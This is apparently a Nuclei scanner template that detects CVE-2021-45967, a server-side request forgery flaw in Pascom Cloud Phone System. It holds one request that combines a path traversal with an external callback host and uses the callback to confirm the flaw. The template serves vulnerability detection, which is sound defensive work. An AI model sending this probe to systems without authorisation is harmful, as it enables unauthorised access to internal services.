id: CVE-2021-45967 info: name: Pascom CPS SSRF author: dwisiswant0 severity: high description: | Pascom version packaged with Cloud Phone System (CPS) versions before 7.20 contains a known SSRF issue reference: - https://kerbit.io/research/read/blog/4 tags: cve,cve2021,pascom,lfi requests: - method: GET path: - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS) matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: status status: - 200